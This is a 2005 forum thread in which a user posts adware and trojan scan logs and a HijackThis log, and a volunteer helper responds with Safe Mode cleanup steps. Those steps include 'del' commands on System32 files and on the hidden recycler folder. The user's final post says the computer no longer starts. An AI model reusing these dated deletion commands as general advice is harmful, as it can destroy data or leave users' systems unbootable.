#6
Buffelberra

Buffelberra

    New Member

  • Topic Starter
  • Member
  • Pip
  • 8 posts
I will send the log from that Panda Online Activescan when its done.




(THANX! :tazz: )
  • 0

#7
Buffelberra

Buffelberra

    New Member

  • Topic Starter
  • Member
  • Pip
  • 8 posts
Hi Again!
Her's the Activescan log an a fresh HijackThis Log.


Incident Status Location

Adware:Adware/SaveNow No disinfected Windows Registry
Adware:Adware Program No disinfected C:\WINDOWS\stsheets.dat
Adware:Adware/NavHelper No disinfected C:\Recycled\Dc100\Temp\NE5B\NHUninstaller.exe
Adware:Adware Program No disinfected C:\WINDOWS\stsheets.dat
Virus:Trj/Downloader.CUU Disinfected C:\WINDOWS\SYSTEM32\123.45


Logfile of HijackThis v1.99.1
Scan saved at 08:28:14, on 2005-06-13
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\SYSTEM32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\SYSTEM32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program\MSN Messenger\msnmsgr.exe
C:\Program\Messenger\Msmsgs.exe
C:\Program\Adobe\Adobe Acrobat 6.0\Distillr\acrotray.exe
C:\Program\F-Secure\Anti-Virus\fsgk32st.exe
C:\Program\F-Secure\Anti-Virus\FSGK32.EXE
C:\Program\F-Secure\BackWeb\7681197\program\fsbwsys.exe
C:\Program\F-Secure\Common\FSMA32.EXE
C:\Program\F-Secure\Anti-Virus\fssm32.exe
C:\Program\F-Secure\Common\FSMB32.EXE
C:\WINDOWS\System32\snmp.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\wdfmgr.exe
C:\Program\F-Secure\Common\FCH32.EXE
C:\Program\F-Secure\Common\FAMEH32.EXE
C:\Program\F-Secure\Common\FNRB32.EXE
C:\Program\F-Secure\Common\FIH32.EXE
C:\Program\F-Secure\Anti-Virus\fsav32.exe
C:\Program\F-Secure\FWES\Program\fsdfwd.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\System32\alg.exe
C:\PROGRAM\MOZILL~1\FIREFOX.EXE
C:\Documents and Settings\Vimo\Skrivbord\hijack this\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.se/
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Länkar
O2 - BHO: PCTools Site Guard - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - C:\Program\SPYWAR~1\tools\iesdsg.dll
O2 - BHO: PCTools Browser Monitor - {B56A7D7D-6927-48C8-A975-17DF180C71AC} - C:\Program\SPYWAR~1\tools\iesdpb.dll
O4 - HKLM\..\Run: [worknote1] C:\WINDOWS\System32\Sysnote.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program\MSN Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [MSMSGS] "C:\Program\Messenger\Msmsgs.exe" /background
O4 - HKCU\..\Run: [Spyware Doctor] "C:\Program\Spyware Doctor\swdoctor.exe" /Q
O4 - Global Startup: Acrobat Assistant.lnk = C:\Program\Adobe\Adobe Acrobat 6.0\Distillr\acrotray.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program\Vanliga filer\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: InterVideo WinCinema Manager.lnk = C:\Program\Common\Bin\WinCinemaMgr.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program\Microsoft Office\Office\OSA9.EXE
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program\Java\j2re1.4.2\bin\npjpi142.dll
O9 - Extra 'Tools' menuitem: Sun Java-konsol - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program\Java\j2re1.4.2\bin\npjpi142.dll
O9 - Extra button: Spyware Doctor - {2D663D1A-8670-49D9-A1A5-4C56B4E14E84} - C:\Program\SPYWAR~1\tools\iesdpb.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program\Messenger\msmsgs.exe
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoft.../as5/asinst.cab
O23 - Service: AdobeVersionCue - Adobe Sytems - C:\Program\Adobe\Adobe Version Cue\service\VersionCue.exe
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\SYSTEM32\ati2sgag.exe
O23 - Service: F-Secure Automatic Update (BackWeb Client - 7681197) - Unknown owner - C:\Program\F-Secure\BackWeb\7681197\Program\SERVIC~1.EXE
O23 - Service: F-Secure Gatekeeper Handler Starter - F-Secure Corp. - C:\Program\F-Secure\Anti-Virus\fsgk32st.exe
O23 - Service: F-Secure Network Request Broker - F-Secure Corporation - C:\Program\F-Secure\Common\FNRB32.EXE
O23 - Service: fsbwsys - F-Secure Corp. - C:\Program\F-Secure\BackWeb\7681197\program\fsbwsys.exe
O23 - Service: F-Secure Anti-Virus Firewall Daemon (FSDFWD) - F-Secure Corporation - C:\Program\F-Secure\FWES\Program\fsdfwd.exe
O23 - Service: F-Secure Management Agent (FSMA) - F-Secure Corporation - C:\Program\F-Secure\Common\FSMA32.EXE
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program\VANLIG~1\SONYSH~1\AVLib\Sptisrv.exe

Thanks for your help!
  • 0

#8
Wizard

Wizard

    Retired Staff

  • Retired Staff
  • 5,661 posts
Instead of having you download more things to delete these files,we will do it the Command Prompt way!

Go back into Safe Mode!

Go to Start>>Run>>Type in CMD and Click OK!

At the Command Prompt Screen type in cd\ and Hit Enter!

Now Type in del C:\WINDOWS\stsheets.dat and Hit Enter!

Note the Space between del and C!

You may get a Message saying files doesnt exist,beings that Panda Says it does,please let me know if that message comes up!

You can also use this command for that file

del stsheets.dat and Hit Enter!

Now for the next entries!

Type in del C:\WINDOWS\SYSTEM32\123.45 and Hit Enter!

Type in del C:\WINDOWS\SYSTEM32\Sysnote.exe and Hit Enter!

Type in del LIDB2.EXE and Hit Enter!

And for the last command:

Type in attrib -h -s c:\recycler and Hit Enter!

Next Type in del c:\recycler and Hit Enter!

Open HijackThis and put a check by these but DO NOT hit the Fix Checked button yet!

O4 - HKLM\..\Run: [worknote1] C:\WINDOWS\System32\Sysnote.exe

Now Make sure ALL WINDOWS and BROWSERS are CLOSED and hit the Fix Checked Button!!

Restart in Normal Mode and do 1 more Online Scan here
http://www.ravantivirus.com/scan/

Please Install these 2 for added Security

SpywareBlaster:
http://www.javacools...areblaster.html
Update Immediatly!

IE Spyad:
http://www.bleepingc...showtutorial=53
There is a direct download inside and great tutorial also!

Here are 2 excellent Programs for Cleaning Up the Temp Files Floating Around

Please Download the MVPS HOSTS file to your Desktop!
http://www.mvps.org/...p2002/hosts.htm

Here is a link to help you if you need it
http://www.mvps.org/...2002/hosts2.htm

CleanUp! 4.0
http://downloads.ste...p/CleanUp40.exe

Run CleanUp!

Click "Cleanup" and it will Scan and Remove all available Temp files>Click "Close">Click "Yes" to Logoff!

Post back with the Results from the Rav Online Scan and a fresh HijackThis log!
  • 0

#9
Buffelberra

Buffelberra

    New Member

  • Topic Starter
  • Member
  • Pip
  • 8 posts
Hi Again!
It comes up a message saying the files i was suppose to delete doesn't exist. But i succed with deleting stsheets.dat. As i couldn't see the file, i simply opened it and saved it on the dektop, and then i made a copy of the file and pasted it into C:/WINDOWS and answered YES on "The file already exists. Do you want to replace it?". Then i was able to see the file, and delete it. But the other files, i couldn't delete.
Thanks for your help!
  • 0

#10
Wizard

Wizard

    Retired Staff

  • Retired Staff
  • 5,661 posts
OK,Works for me!!

If you dont mind,Run that Online Scan from Rav and POst any results along with a fresh HijackThis log!
  • 0

#11
Buffelberra

Buffelberra

    New Member

  • Topic Starter
  • Member
  • Pip
  • 8 posts
OK.
But wich file should i scan?? I don't see any "scan my computer" or something like that. This is the page isn't it ?:
http://www.ravantivirus.com/scan/
Bye
  • 0

#12
Wizard

Wizard

    Retired Staff

  • Retired Staff
  • 5,661 posts
Sorry about that!!!

http://www.ravantivi.../howto-scan.php
  • 0

#13
Buffelberra

Buffelberra

    New Member

  • Topic Starter
  • Member
  • Pip
  • 8 posts
Thanks..
But. Now my computer is broken. It wont start... So maybe i come back to this forum later. Thank you for helping me!
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP